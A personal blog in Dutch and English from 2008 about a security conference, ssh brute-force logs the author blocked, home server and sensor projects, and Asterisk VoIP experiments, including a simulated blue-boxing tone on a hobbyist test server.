Donderdag en vrijdag was ik op de Surf-IBO (informatie beveiligings overleg) congres. Dit uit mijn nieuwe rol als Cert-UU teamlid. Leuke lezingen aangehoord, een hoop bekende mensen en nieuwe mensen gezien. De leukste lezing was wel The history of cryptography door Simon Singh die een echte werkende Enigma machine uit 1936 bij zich had. Beveiliging is duidelijk aan het opgroeien. Ik lees toevallig net weer eens het boek At large: the strange case of the world's biggest internet invasion en het verschil tussen beveiliging toen dit verhaal speelde (1992) en nu is enorm groot. En volgens de presentatie van Don Stikvoort over computer emergency response teams is er nog een (lang) pad naar volwassen wording. Ik ben benieuwd. Computer security heeft al jaren mijn interesse, ik vind het erg leuk om daar wat actiever mee te gaan doen door lid te worden van het Cert-UU team.

I implemented xkcd - Tones. My Nokia 6300 now makes a real ringing sound.

Looking at the security logs I saw a new kind of distributed ssh attack. Not the usual dictionary of common login names but a start at

Sep 30 19:13:06 idefix sshd[99210]: Illegal user aaa from 67.152.2.17
Sep 30 19:13:06 idefix sshd[99210]: Failed unknown for illegal user aaa from 67. 152.2.17 port 36709 ssh2

Slowly but surely working towards

Oct  1 11:30:20 idefix sshd[32699]: Illegal user asn from 196.211.228.226
Oct  1 11:30:21 idefix sshd[32699]: Failed unknown for illegal user asn from 196.211.228.226 port 58586 ssh2

With a bit of grep and awk later I found 174 attempts like this (3 letter account names) from 102 IPs. Now all added to the firewalling rules.

The complete list of source IPs attacking ssh

Update 2008-10-01: still going strong: 211 attempts from 126 IP addresses. Firewall rules updated. List updated.

On-line gezet: de source en de audio voor het Asterisk belspel. En de demoversie is nu beschikbaar zonder dat er een server extra thuis voor draait.

It seems my homepage has turned into a livejournal. It seems someone prefers following my homepage via the livejournal interface. And this page just copies information from my rss feed.
Update 2008-09-28: reader found (hi rone!).

The home server has been nagging for a while it wants a Debian upgrade (olstable -> stable) and it is not very 'green' at the moment as it sucks up a lot of electricity. I hope to measure the exact amount soon. I will tackle both problems and do a complete rebuild (the home server as it is is almost 8 years old). Start with a new mainboard, cpu, memory, cooler and disks aimed at sucking up less electricity. And start with a new Linux installation: Ubuntu server edition. I tried this at work and I like it. The tools I know from Debian but not the whole free software action front included. Time to order hardware and find installation time.

De DOSgg gebruikersdag zaterdag was gezellig en Kees van Eeten (van de DOSgg) en ik hebben er leuk met Asterisk gespeeld en vragen over VoIP beantwoord. Niet veel mensen wilden 'spelen' met de centrales en er is niet een keer naar 'buiten' gebeld. Maar het is in ieder geval leuk om dit contact nu te hebben met mensen binnen de DOSgg die actief zijn met VoIP.

Opened the home server last evening to replace a 40-pin IDE cable with a 80-pin one and replace a fan with one that has 3 leads and no clogged dust. The added advantage is that this fan now shows up in sensors so the assorted sensors at home now shows 2 fan speeds. There is a third fan sucking air via the harddisks connected to the mainboard with a 3 lead cable but it isn't measured for as far as I can find it.

You can check out of the NTP Pool anytime, but you can never leave...
Two years after we removed a server from the ntp pool we still see regular traffic to that IP. Documented in the NTP events log, we still have over a hundred regular clients.
With regards to the Eagles.

Neat asterisk trick I discovered: You can play musiconhold while waiting for a script to finish! Just use the Local pseudo channel and set up a call to the extension that can take a while to process. I wanted this for a situation where the phone was already answered but longer processing was happening from an external script.

[metarwaittest]

exten => s,1,Answer()
exten => s,n,Dial(local/s@metarspoken-eham,60,m)

[metarspoken-eham]

; EHAM = Amsterdam Schiphol airport

exten => s,1,Ringing
exten => s,n,System('/usr/lib/asterisk/scripts/getmetarforasterisk EHAM')
exten => s,n,Answer()

The processing in the script can take quite some time, so the music on hold is played while waiting.

In de voorbereidingen voor de DOSgg gebruikersdag op 20 September heb ik weer het nodige met Asterisk gespeeld (ik kan het niet laten). Leuke dingen: twee asterisk centrales aan elkaar die daar in hun dialplan rekening mee houden en web overzichten vanuit de Asterisk Manager API waar in theorie ook een leuke click-to-dial applicatie mee te bouwen is of andere manieren om Asterisk te koppelen met web.

Our birthday present was a Garmin Etrex Vista HCx gps and we took it cycling today. We ordered a routing cycling map for the Netherlands but it hasn't shown up in the mail yet, so I tried the Garmin maps from OpenStreetMap which work great. They can't be used for route-calculations on the gps itself, but they know every little road around here that is in OpenStreetMap. I got quite a kick out of cycling over a path which I have added to OpenStreetMap myself.

Using the Asterisk manager API it is quite simple to query Asterisk for its status. Using that documentation and a bit of php I was able to throw together a webpage on the demoserver which shows the active calls.

Op zaterdag 20 September is er een DOSgg gebruikersdag waar we met een paar mensen van de netwerkgroep ook heen gaan. Ik ga in ieder geval proberen de asterisk democentrale te koppelen met de asterisk democentrale van de DOSgg.

The replacement 1-wire interface arrived and the 1-wire network at home is working again. I also added a few temperature sensors so the assorted sensors at home now also show the crawl space temperature. Yes, I crawled under the house and hung a temperature sensor from the underside of the floor, connected to the 1-wire network. Correlating the temperatures over longer time with the weather can give me an insight whether underfloor isolation and heating pipe isolation will have a lot of influence on our heating bill.

No success in getting CÆSAR to reliably box a call on the Project MF server last evening. I think the main problem is with the sound driver or sound hardware not liking what I want to do: generate multi frequency tones. Lots of weird clicks and echoes happened on two different systems (with alsa sound drivers). But I had fun with Asterisk in the process. Legal phreaking over voip: who would have thought that to be possible.
Update 2008-09-09: It's now working. I installed CÆSAR on another PC running the oss sound drivers, and there were no weird clicks and echos. I added the pure 2600 tone to the caesar.rc file as

tone clear_test {
freq 2600
delay 0 duration 500
}
map '=' clear_test

and I could play with the projectmf server after I put the speakerphone close to the speakers. Loads of fun with the echo test: hearing my own voice echoed over a server with a Chicago phone number. Although I called it via the iax2 method.

The History of Phone Phreaking. A very cool site about the history (and history it is, going waaay back) of phone phreaking. With interesting information about the process of researching that history.

Found via Jason Scott: The FBI File of Yipl/TAP

Interesting thing to try: see if I can get CÆSAR, an open-source MF / DTMF generator or blue box for Linux working to make a call to the Project MF server to simulate blue boxing. But it will be from a phone behind an asterisk test server so I don't have to pay to call a US number.

Pouring rain this morning... the most interesting weather sensor at home would be a rain sensor, which is planned in the self-powering weather station.